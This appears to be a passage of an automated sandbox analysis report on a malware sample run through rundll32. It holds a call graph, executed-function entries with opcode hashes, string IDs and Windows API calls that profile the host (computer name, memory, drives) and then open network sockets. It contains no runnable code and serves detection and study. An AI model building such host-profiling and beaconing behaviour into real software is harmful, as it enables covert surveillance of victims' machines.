47507->47509 47534 7f2efd72 RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 47508->47534 47533 7f2c1a90 RaiseException CallUnexpected Concurrency::cancel_current_task 47509->47533 47525 7f2ef9e4 47512->47525 47514 7f2ef99b 47513->47514 47517 7f2ef9a2 47513->47517 47515 7f2ff48f std::_Lockit::_Lockit 6 API calls 47514->47515 47516 7f2a56cc 47515->47516 47519 7f2aaa20 47516->47519 47517->47516 47518 7f2f0410 std::_Lockit::_Lockit EnterCriticalSection 47517->47518 47518->47516 47520 7f2aaa31 47519->47520 47521 7f2aaa65 47519->47521 47522 7f2ef98c std::_Lockit::_Lockit 7 API calls 47520->47522 47521->47503 47523 7f2aaa3b 47522->47523 47524 7f2ef9e4 std::_Lockit::~_Lockit LeaveCriticalSection LeaveCriticalSection 47523->47524 47524->47521 47526 7f2ef9ee 47525->47526 47527 7f2ff49d 47525->47527 47528 7f2efa01 47526->47528 47530 7f2f041e std::_Lockit::~_Lockit LeaveCriticalSection 47526->47530 47529 7f2ff478 std::_Lockit::~_Lockit LeaveCriticalSection 47527->47529 47528->47505 47531 7f2ff4a4 47529->47531 47530->47528 47531->47505 47532->47507 47533->47512 47534->47512 47535->47492 47536->47495 47537->47490 47538->47468 47540 7f2f07db std::_Facet_Register 3 API calls 47539->47540 47541 7f2a62c6 47540->47541 47543 7f2a62e0 47541->47543 47544 7f2efda4 36 API calls 6 library calls 47541->47544 47543->47460 47544->47543 47546 7f2a8aeb 47545->47546 47548 7f2a8b3a 47546->47548 47554 7f2d8500 26 API calls std::ios_base::clear 47546->47554 47548->47416 47553 7f2a57e0 59 API calls 5 library calls 47548->47553 47550 7f2a9c23 47549->47550 47552 7f2a9c4c 47550->47552 47555 7f2c16e0 26 API calls std::ios_base::clear 47550->47555 47552->47067 47553->47416 47554->47548 47555->47552 47557 7f299278 47556->47557 47558 7f2a8aa0 26 API calls 47557->47558 47562 7f2992f8 47558->47562 47559 7f2c4ee0 std::ios_base::clear 26 API calls 47560 7f2995db 47559->47560 47561 7f2a9c00 26 API calls 47560->47561 47563 7f293d9d 47561->47563 47562->47559 47563->47078 47565 7f29d0e3 47564->47565 47566 7f29d186 47565->47566 47567 7f2a67d0 numpunct 26 API calls 47565->47567 47569 7f2a9e80 26 API calls 47566->47569 47568 7f29d116 47567->47568 47580 7f294850 26 API calls std::ios_base::clear 47568->47580 47571 7f29d1d6 47569->47571 47571->47268 47572 7f29d138 47581 7f2c58b0 26 API calls 2 library calls 47572->47581 47574 7f29d15a 47582 7f2f1ac5 RaiseException 47574->47582 47576 7f29d16b 47577 7f2c20f0 std::ios_base::clear 11 API calls 47576->47577 47578 7f29d177 47577->47578 47579 7f2c20f0 std::ios_base::clear 11 API calls 47578->47579 47579->47566 47580->47572 47581->47574 47582->47576 47586 7f2e25e3 47583->47586 47584 7f2c20f0 std::ios_base::clear 11 API calls 47585 7f2c5a61 47584->47585 47585->47276 47586->47584 47589 7f2e7a2b 47587->47589 47588 7f2a67d0 numpunct 26 API calls 47590 7f2e7b4e 47588->47590 47589->47588 47591 7f2c20f0 std::ios_base::clear 11 API calls 47590->47591 47592 7f2c5a82 47591->47592 47592->47280 47593 7f2ed7a5 47594 7f2ed7d2 swprintf 47593->47594 47595 7f2c3740 9 API calls 47594->47595 47596 7f2ed7f0 47595->47596 47597 7f2ee44b 47596->47597 47599 7f2ed7f8 swprintf 47596->47599 47598 7f2d8840 3 API calls 47597->47598 47603 7f2ee45f swprintf 47597->47603 47598->47603 47602 7f2ed8cb GetTempFileNameW 47599->47602 47600 7f2ee441 47601 7f2ee5e3 lstrlenW 47601->47603 47604 7f2ed94e GetCurrentDirectoryA 47602->47604 47603->47600 47603->47601 47606 7f2eda30 47604->47606 47606->47600 47607 7f2edb93 GetTempFileNameA 47606->47607 47609 7f2edbf7 swprintf 47607->47609 47608 7f2ede9e GetPEB 47610 7f2edf01 47608->47610 47609->47608 47611 7f2b77a0 3 API calls 47610->47611 47612 7f2ee11e 47611->47612 47613 7f2ee12d GetPEB 47612->47613 47614 7f2ee125 ExitProcess 47612->47614 47618 7f2ee1e8 CreateThread 47613->47618 47616 7f2a1e40 GetPEB 47617 7f2ee42c 47616->47617 47620 7f2a20b0 GetPEB 47617->47620 47618->47616 47621 7f2b9830 257 API calls 4 library calls 47618->47621 47620->47600 47622 7f2ecaf0 GetSystemDirectoryW 47623 7f2d8840 3 API calls 47622->47623 47624 7f2ecd96 swprintf 47623->47624 47625 7f2d8840 3 API calls 47624->47625 47626 7f2ee441 swprintf 47624->47626 47629 7f2ed293 swprintf 47625->47629 47627 7f2c3740 9 API calls 47628 7f2ed7f0 47627->47628 47630 7f2ee44b 47628->47630 47632 7f2ed7f8 swprintf 47628->47632 47629->47626 47629->47627 47631 7f2d8840 3 API calls 47630->47631 47635 7f2ee45f swprintf 47630->47635 47631->47635 47634 7f2ed8cb GetTempFileNameW 47632->47634 47633 7f2ee5e3 lstrlenW 47633->47635 47637 7f2ed94e GetCurrentDirectoryA 47634->47637 47635->47626 47635->47633 47638 7f2eda30 47637->47638 47638->47626 47639 7f2edb93 GetTempFileNameA 47638->47639 47641 7f2edbf7 swprintf 47639->47641 47640 7f2ede9e GetPEB 47642 7f2edf01 47640->47642 47641->47640 47643 7f2b77a0 3 API calls 47642->47643 47644 7f2ee11e 47643->47644 47645 7f2ee12d GetPEB 47644->47645 47646 7f2ee125 ExitProcess 47644->47646 47650 7f2ee1e8 CreateThread 47645->47650 47648 7f2a1e40 GetPEB 47649 7f2ee42c 47648->47649 47652 7f2a20b0 GetPEB 47649->47652 47650->47648 47653 7f2b9830 257 API calls 4 library calls 47650->47653 47652->47626

                                                Executed Functions

                                                Function 7F2ECDA9 Relevance: 22.4, APIs: 6, Strings: 6, Instructions: 1355COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Navigation to non-$-$MNo name attribute $TMP$TMP$The server or prox
                                                • API String ID: 0-3937262799
                                                • Opcode ID: 171105174514c2b52ab88f5799efa9c5281d44ad5335083fbcc79c13ea6687d4
                                                • Instruction ID: b56fe185457e9e9b66703869efb532490b66dad82c779f229e86eccacab81925
                                                • Opcode Fuzzy Hash: 171105174514c2b52ab88f5799efa9c5281d44ad5335083fbcc79c13ea6687d4
                                                • Instruction Fuzzy Hash: 2FE24579D04229CBDB25CF69C894BEDBBB5BF48310F6881DED409A7285DB346A80CF50
                                                Function 7F2B9830 Relevance: 21.2, APIs: 4, Strings: 6, Instructions: 3679sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsCharLowerA.USER32(00000073), ref: 7F2B9A60
                                                • GetTempPathW.KERNEL32(00000104,?,?), ref: 7F2BA0C7
                                                • GetEnvironmentVariableW.KERNEL32(PATH,00000000,00000000,00000000,00000000,B8A6976E,00000000), ref: 7F2BA36C
                                                  • Part of subcall function 7F2C7680: std::exception::exception.LIBCMTD ref: 7F2C76B0
                                                • Sleep.KERNEL32(?), ref: 7F2BD30E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CharEnvironmentLowerPathSleepTempVariablestd::exception::exception
                                                • String ID: 9mD$MNo name attribute $PATH$u${$~
                                                • API String ID: 1510289414-1868743812
                                                • Opcode ID: 07d056e46338cc3343766af40e0a728b0a2dc35470a4c16247bb95b585912576
                                                • Instruction ID: 9e9d1a3902b6c55ce9eaa64fc03bbe541491dda87d52d26d988d6dea2d24625b
                                                • Opcode Fuzzy Hash: 07d056e46338cc3343766af40e0a728b0a2dc35470a4c16247bb95b585912576
                                                • Instruction Fuzzy Hash: 108357B1D053689FCB20EB68CD45BDDBBB5AB99704F5082CDD409A7281EB351B84CF92
                                                Function 7F2C3740 Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1205COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 2$MNo name attribute $Q$\$advapi32$c$Operation
                                                • API String ID: 0-301690894
                                                • Opcode ID: cbacd69911c02eabbcb18b4f0f901235e204357e1e53c45bf17bd8420633b601
                                                • Instruction ID: 8e8b3bf8c0a9e8c249a2ec34dbd20ef31a567322ce065ce96dfbc9b69c014536
                                                • Opcode Fuzzy Hash: cbacd69911c02eabbcb18b4f0f901235e204357e1e53c45bf17bd8420633b601
                                                • Instruction Fuzzy Hash: 8BE20478D052698FDB25CF69C890BEEBBB6BF49304F1482DAD449A7345D734AA81CF40
                                                Function 7F2E4390 Relevance: 15.1, APIs: 6, Strings: 1, Instructions: 2845networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F293DB0: std::ios_base::clear.LIBCPMTD ref: 7F29421A
                                                • socket.WS2_32(?,?,?), ref: 7F2E52C3
                                                • gethostbyname.WS2_32(?), ref: 7F2E565F
                                                • connect.WS2_32(?,?,?), ref: 7F2E6255
                                                • send.WS2_32(?,?,?,?), ref: 7F2E6649
                                                • recv.WS2_32(?,?,?,?), ref: 7F2E6AA2
                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7F2E799B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Ios_base_dtorconnectgethostbynamerecvsendsocketstd::ios_base::_std::ios_base::clear
                                                • String ID: -P
                                                • API String ID: 3660264722-3391753047
                                                • Opcode ID: 8a7c0297247615e23b133b650cb12905cb2a320eb3c210d691e6696c9834e403
                                                • Instruction ID: b569bfba1c8c97ae0abe66c96ef89716f5acba6ee83d61c8198f621cb9ac0ffd
                                                • Opcode Fuzzy Hash: 8a7c0297247615e23b133b650cb12905cb2a320eb3c210d691e6696c9834e403
                                                • Instruction Fuzzy Hash: 3C73ACB4E052698FCB65CF28C994BD9BBB1BF88304F1081DAD849A7345DB35AE81CF54
                                                Function 7F2ECE97 Relevance: 13.0, APIs: 4, Strings: 3, Instructions: 703COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Navigation to non-$TMP$TMP
                                                • API String ID: 0-443054689
                                                • Opcode ID: 105e2ba5872c7a04fa53bba5069b8e1360fefb1ec5118871047003f5c02dcbf9
                                                • Instruction ID: 44c69384a725541a05086ecbcacf200cfbf5d07f9f85d9a9f18231bc44c3117c
                                                • Opcode Fuzzy Hash: 105e2ba5872c7a04fa53bba5069b8e1360fefb1ec5118871047003f5c02dcbf9
                                                • Instruction Fuzzy Hash: 00725775904229CFDB25CF69C898BEDB7B6FB48310F6881DED449A7285DB346A80CF50
                                                Function 7F2ECE45 Relevance: 13.0, APIs: 4, Strings: 3, Instructions: 702COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Navigation to non-$TMP$TMP
                                                • API String ID: 0-443054689
                                                • Opcode ID: 0a1607d2d9155f674bc7e76729fcdab97fb36233cd63a09034fab0f8d8041408
                                                • Instruction ID: 269f39caafa096520a3281057ea4e439a27391cd458725f3b37978e519975a10
                                                • Opcode Fuzzy Hash: 0a1607d2d9155f674bc7e76729fcdab97fb36233cd63a09034fab0f8d8041408
                                                • Instruction Fuzzy Hash: B8725875904229CFDB25CF69C898BEDB7B6FB48310F6881DED449A7285DB346A80CF50
                                                Function 7F2ECE02 Relevance: 13.0, APIs: 4, Strings: 3, Instructions: 701COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Navigation to non-$TMP$TMP
                                                • API String ID: 0-443054689
                                                • Opcode ID: 62d483a6381a8a8480c48b36cdb2fa96ff068cc3b0ce42aed8fb95a1062b29f7
                                                • Instruction ID: 4ccf5db123328931d5c8b5f0a5943b9a663e60ecb33877da90f1285f7b981f2e
                                                • Opcode Fuzzy Hash: 62d483a6381a8a8480c48b36cdb2fa96ff068cc3b0ce42aed8fb95a1062b29f7
                                                • Instruction Fuzzy Hash: C7726775904269CFDB25CF69C898BEDB7B6FB48310F6881DED449A7285DB346A80CF10
                                                Function 7F2ED039 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 673COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Navigation to non-$TMP$TMP
                                                • API String ID: 0-443054689
                                                • Opcode ID: 3061010e592922abb88e9be2b2f19ac508ed70d4852c0cfaf0fe4cd1f0ca304b
                                                • Instruction ID: 4c3527bd2b8b9dab86333cb04ba21000f1c290c7d3762d4a1a66694bbc6e4fd2
                                                • Opcode Fuzzy Hash: 3061010e592922abb88e9be2b2f19ac508ed70d4852c0cfaf0fe4cd1f0ca304b
                                                • Instruction Fuzzy Hash: 65726979904229CFDB25CF69C894BADB7B6FB48310F6881DED449A7385DB346A80CF50
                                                Function 7F2ED47E Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 495COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: TMP$TMP
                                                • API String ID: 0-2876906010
                                                • Opcode ID: 3c2b0c8af8ba859aa1f7453f2c381f4441856d3e8d8d6ad26bc6299e31fffc40
                                                • Instruction ID: 49012cbe86e37617b4064e42d3d09721c78eef610ad7b29d0b2c72af17132ad5
                                                • Opcode Fuzzy Hash: 3c2b0c8af8ba859aa1f7453f2c381f4441856d3e8d8d6ad26bc6299e31fffc40
                                                • Instruction Fuzzy Hash: EC424674904269CFDB25CF65C894BADB7B6FB48310F6881DED409A7386DB34AA80CF50
                                                Function 7F2ED7A5 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 401stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTempFileNameW.KERNEL32(7F318204,TMP,00000000,?,?,?,05BFEAE5,00059755,FFFFFE9B,FFFFFFFF,?,?), ref: 7F2ED8FE
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 7F2EDA1A
                                                • lstrlenW.KERNEL32(?), ref: 7F2EE5FE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectoryFileNameTemplstrlen
                                                • String ID: TMP$TMP
                                                • API String ID: 1953906443-2876906010
                                                • Opcode ID: 83866fa1bbf067e67c76293d064c61fbbe81e83da1c09abbc36c7d026f65bc8f
                                                • Instruction ID: c741e9e3c211c39d5c2e0076dc8fff99e59a2605ebff89cdf2cea4ab434c8881
                                                • Opcode Fuzzy Hash: 83866fa1bbf067e67c76293d064c61fbbe81e83da1c09abbc36c7d026f65bc8f
                                                • Instruction Fuzzy Hash: 3B221275905269CFDB24CF69C894BEDB7B6BB48310F6881DED409A7386DB346A80CF50
                                                Function 7F2DF830 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 635COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4043 7f2df830-7f2df859 call 7f2adf00 4046 7f2df864-7f2df868 4043->4046 4047 7f2df8ae-7f2df8fc call 7f2a1d50 4046->4047 4048 7f2df86a-7f2df8ac 4046->4048 4053 7f2df8fe-7f2df903 4047->4053 4054 7f2df908-7f2df9b6 4047->4054 4048->4046 4055 7f2e02d4-7f2e02d9 4053->4055 4056 7f2df9c1-7f2df9c5 4054->4056 4057 7f2dfa0c-7f2dfb1e call 7f2a1f90 CoInitializeSecurity 4056->4057 4058 7f2df9c7-7f2dfa0a 4056->4058 4062 7f2dfb29-7f2dfb2d 4057->4062 4058->4056 4063 7f2dfb2f-7f2dfb72 4062->4063 4064 7f2dfb74-7f2dfbd1 call 7f2a1f60 4062->4064 4063->4062 4069 7f2dfbd7-7f2dfc94 4064->4069 4070 7f2dfd32-7f2dfddd 4064->4070 4071 7f2dfc9f-7f2dfca3 4069->4071 4072 7f2dfde8-7f2dfdec 4070->4072 4073 7f2dfcea-7f2dfd2d call 7f2a1f30 4071->4073 4074 7f2dfca5-7f2dfce8 4071->4074 4075 7f2dfdee-7f2dfe31 4072->4075 4076 7f2dfe33-7f2dfe95 4072->4076 4073->4055 4074->4071 4075->4072 4082 7f2dffdc-7f2e0099 4076->4082 4083 7f2dfe9b-7f2dff3e 4076->4083 4085 7f2e00a4-7f2e00a8 4082->4085 4091 7f2dff49-7f2dff4d 4083->4091 4086 7f2e00ef-7f2e014e call 7f2a1cc0 CoSetProxyBlanket 4085->4086 4087 7f2e00aa-7f2e00ed 4085->4087 4095 7f2e0154-7f2e0237 4086->4095 4096 7f2e02d2 4086->4096 4087->4085 4093 7f2dff4f-7f2dff92 4091->4093 4094 7f2dff94-7f2dffd7 call 7f2a1f30 4091->4094 4093->4091 4094->4055 4103 7f2e0242-7f2e0246 4095->4103 4096->4055 4104 7f2e028d-7f2e02d0 call 7f2a1f30 4103->4104 4105 7f2e0248-7f2e028b 4103->4105 4104->4055 4105->4103
                                                APIs
                                                • CoInitializeSecurity.COMBASE(00000000,00000000), ref: 7F2DFA5A
                                                • CoSetProxyBlanket.COMBASE(00000000,00000000,00000003,00000003,00000000,00000000), ref: 7F2E0140
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BlanketInitializeProxySecurity
                                                • String ID: w$}
                                                • API String ID: 257369873-1906527200
                                                • Opcode ID: 9a45d7b3276a410646b214fad6983555a45010693047f8dfdab9eac1a8ec6ceb
                                                • Instruction ID: c2e4435f6cd0f7f0031c53d11a75814cccb51e03f22842a192d64be465443691
                                                • Opcode Fuzzy Hash: 9a45d7b3276a410646b214fad6983555a45010693047f8dfdab9eac1a8ec6ceb
                                                • Instruction Fuzzy Hash: 67621534A14269CBDB24CFA4C850BDEB7B2EF99300F1081A9D50DAB3A4E7755A85CF49
                                                Function 7F2DE1C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4110 7f2de1c0-7f2de204 GetPEB 4111 7f2de207-7f2de250 4110->4111 4112 7f2de25b 4111->4112 4113 7f2de252-7f2de259 4111->4113 4114 7f2de262-7f2de26e 4112->4114 4113->4114 4115 7f2de274-7f2de27a 4114->4115 4116 7f2de330-7f2de34e 4114->4116 4118 7f2de27d-7f2de290 4115->4118 4116->4111 4117 7f2de354 4116->4117 4119 7f2de35b-7f2de398 GlobalMemoryStatusEx call 7f2f0bb0 * 2 4117->4119 4118->4116 4120 7f2de296-7f2de2b1 4118->4120 4122 7f2de2b8-7f2de2cf 4120->4122 4123 7f2de2d9-7f2de2ea 4122->4123 4124 7f2de2d1-7f2de2f3 4122->4124 4123->4122 4128 7f2de32b 4124->4128 4129 7f2de2f5-7f2de329 4124->4129 4128->4118 4129->4119
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv$GlobalMemoryStatus
                                                • String ID: @
                                                • API String ID: 2185283323-2766056989
                                                • Opcode ID: 8734f1211b85a6318f929fc4cf8eb8f3e69b817ff5f0d72e8ab336c98d0aaec9
                                                • Instruction ID: 659e62f4466d5c478620ce45b22df7d1eb970d85bdbf3215167a53cb1917a8d8
                                                • Opcode Fuzzy Hash: 8734f1211b85a6318f929fc4cf8eb8f3e69b817ff5f0d72e8ab336c98d0aaec9
                                                • Instruction Fuzzy Hash: B87180B8E04259DFCB08CF98C590AEEFBB1BF48304F248199E915AB345D734AA45CF95
                                                Function 7F2D9D20 Relevance: 6.8, Strings: 5, Instructions: 533COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4131 7f2d9d20-7f2d9d40 call 7f2df830 4134 7f2d9daf-7f2d9dd9 call 7f2ae070 4131->4134 4135 7f2d9d42-7f2d9d4f 4131->4135 4140 7f2d9de4-7f2d9de8 4134->4140 4136 7f2d9d55-7f2d9d65 4135->4136 4136->4136 4138 7f2d9d67-7f2d9da5 call 7f2c3290 4136->4138 4147 7f2da55a-7f2da55f 4138->4147 4142 7f2d9e2e-7f2d9e9e 4140->4142 4143 7f2d9dea-7f2d9e2c 4140->4143 4146 7f2d9ea9-7f2d9ead 4142->4146 4143->4140 4148 7f2d9eaf-7f2d9ee9 4146->4148 4149 7f2d9eeb-7f2d9f45 4146->4149 4148->4146 4152 7f2da12b-7f2da13d 4149->4152 4153 7f2d9f4b-7f2da02f 4149->4153 4154 7f2da3d4-7f2da3f1 4152->4154 4155 7f2da143-7f2da167 4152->4155 4165 7f2da03a-7f2da03e 4153->4165 4164 7f2da3f6-7f2da4c6 4154->4164 4160 7f2da169-7f2da176 4155->4160 4161 7f2da1d1-7f2da23a call 7f2a1d20 4155->4161 4162 7f2da17c-7f2da18c 4160->4162 4180 7f2da245-7f2da249 4161->4180 4162->4162 4166 7f2da18e-7f2da1cc call 7f2c3290 4162->4166 4177 7f2da4d1-7f2da4d5 4164->4177 4167 7f2da085-7f2da0d0 call 7f2a1f30 4165->4167 4168 7f2da040-7f2da083 4165->4168 4166->4154 4187 7f2da0d6-7f2da0e6 4167->4187 4168->4165 4178 7f2da51c-7f2da555 call 7f2a1f30 4177->4178 4179 7f2da4d7-7f2da51a 4177->4179 4178->4147 4179->4177 4184 7f2da24b-7f2da28e 4180->4184 4185 7f2da290-7f2da2d8 4180->4185 4184->4180 4190 7f2da2dd-7f2da349 call 7f2a1ea0 call 7f2c2420 call 7f2a1db0 call 7f2ee9e0 4185->4190 4187->4187 4189 7f2da0e8-7f2da126 call 7f2c3290 4187->4189 4189->4147 4203 7f2da34f-7f2da35f 4190->4203 4203->4203 4204 7f2da361-7f2da3cd call 7f2c3290 call 7f2c2a20 call 7f2a1fc0 4203->4204 4204->4154
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 5$G$N/A$r$t
                                                • API String ID: 0-3929796496
                                                • Opcode ID: e1029f37fe78590a49bab602cb643bf1df415b3d99f6cb3ec48a8ee3050fc598
                                                • Instruction ID: dc0862070f2beaee3a6142652d4ff942f8045e78308583839de7134a05853e43
                                                • Opcode Fuzzy Hash: e1029f37fe78590a49bab602cb643bf1df415b3d99f6cb3ec48a8ee3050fc598
                                                • Instruction Fuzzy Hash: 01420474E042698BDB18CFA8C890BDEB7B2FF88300F1081A9E519A7351EB755E85CF55
                                                Function 7F2D95F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4213 7f2d95f0-7f2d9815 4214 7f2d984c-7f2d9853 4213->4214 4215 7f2d9817-7f2d984a 4213->4215 4216 7f2d986f-7f2d988b GetProcessHeap 4214->4216 4217 7f2d9855-7f2d986b 4214->4217 4215->4216 4218 7f2d988d-7f2d9895 4216->4218 4219 7f2d98a0 4216->4219 4217->4216 4218->4219 4221 7f2d9897-7f2d989e 4218->4221 4220 7f2d98a7-7f2d98ae 4219->4220 4222 7f2d98be-7f2d98c1 4220->4222 4223 7f2d98b0-7f2d98bc 4220->4223 4221->4220 4224 7f2d98c6-7f2d98d8 4222->4224 4223->4224 4225 7f2d98ed 4224->4225 4226 7f2d98da 4224->4226 4229 7f2d98f4-7f2d98fc 4225->4229 4227 7f2d98dc-7f2d98e2 4226->4227 4228 7f2d98e4-7f2d98eb 4226->4228 4227->4225 4227->4228 4228->4229 4230 7f2d990c-7f2d9952 4229->4230 4231 7f2d98fe-7f2d9909 GetDriveTypeA 4229->4231 4231->4230
                                                APIs
                                                • GetProcessHeap.KERNEL32 ref: 7F2D986F
                                                • GetDriveTypeA.KERNEL32(7F3181EC), ref: 7F2D9903
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DriveHeapProcessType
                                                • String ID: *
                                                • API String ID: 2912393814-163128923
                                                • Opcode ID: ce6ee7c6223b37c51f8a1b20520a4b2a94e183d7eb465373d9e9258e90a4c6e4
                                                • Instruction ID: 3e7d766fe9474a228542c2b00e934d3ff32f55aace020dc2ed12bb64f9ca57a2
                                                • Opcode Fuzzy Hash: ce6ee7c6223b37c51f8a1b20520a4b2a94e183d7eb465373d9e9258e90a4c6e4
                                                • Instruction Fuzzy Hash: 8DA12679D05298CFCB14CFAAC44179DBBB6BB49320F28819EE449E7382DB342A54CF55
                                                Function 7F2DE690 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4266 7f2de690-7f2de6ed GetPEB 4267 7f2de6f0-7f2de745 4266->4267 4268 7f2de747-7f2de74e 4267->4268 4269 7f2de750 4267->4269 4270 7f2de757-7f2de763 4268->4270 4269->4270 4271 7f2de769-7f2de76f 4270->4271 4272 7f2de825-7f2de843 4270->4272 4274 7f2de772-7f2de785 4271->4274 4272->4267 4273 7f2de849 4272->4273 4275 7f2de850-7f2de868 GetComputerNameExA 4273->4275 4274->4272 4276 7f2de78b-7f2de7a6 4274->4276 4277 7f2de86a-7f2de877 4275->4277 4278 7f2de8d5-7f2de8ed call 7f2a1f00 4275->4278 4279 7f2de7ad-7f2de7c4 4276->4279 4282 7f2de87d-7f2de88d 4277->4282 4292 7f2de8ef-7f2de8fc 4278->4292 4293 7f2de957-7f2de966 4278->4293 4280 7f2de7ce-7f2de7df 4279->4280 4281 7f2de7c6-7f2de7e8 4279->4281 4280->4279 4287 7f2de7ea-7f2de81e 4281->4287 4288 7f2de820 4281->4288 4282->4282 4285 7f2de88f-7f2de8d0 call 7f2c3290 4282->4285 4294 7f2de9c1-7f2de9c4 4285->4294 4287->4275 4288->4274 4295 7f2de902-7f2de912 4292->4295 4296 7f2de96c-7f2de97c 4293->4296 4295->4295 4297 7f2de914-7f2de955 call 7f2c3290 4295->4297 4296->4296 4298 7f2de97e-7f2de9bc call 7f2c3290 4296->4298 4297->4294 4298->4294
                                                APIs
                                                • GetComputerNameExA.KERNEL32(?,?,?), ref: 7F2DE863
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
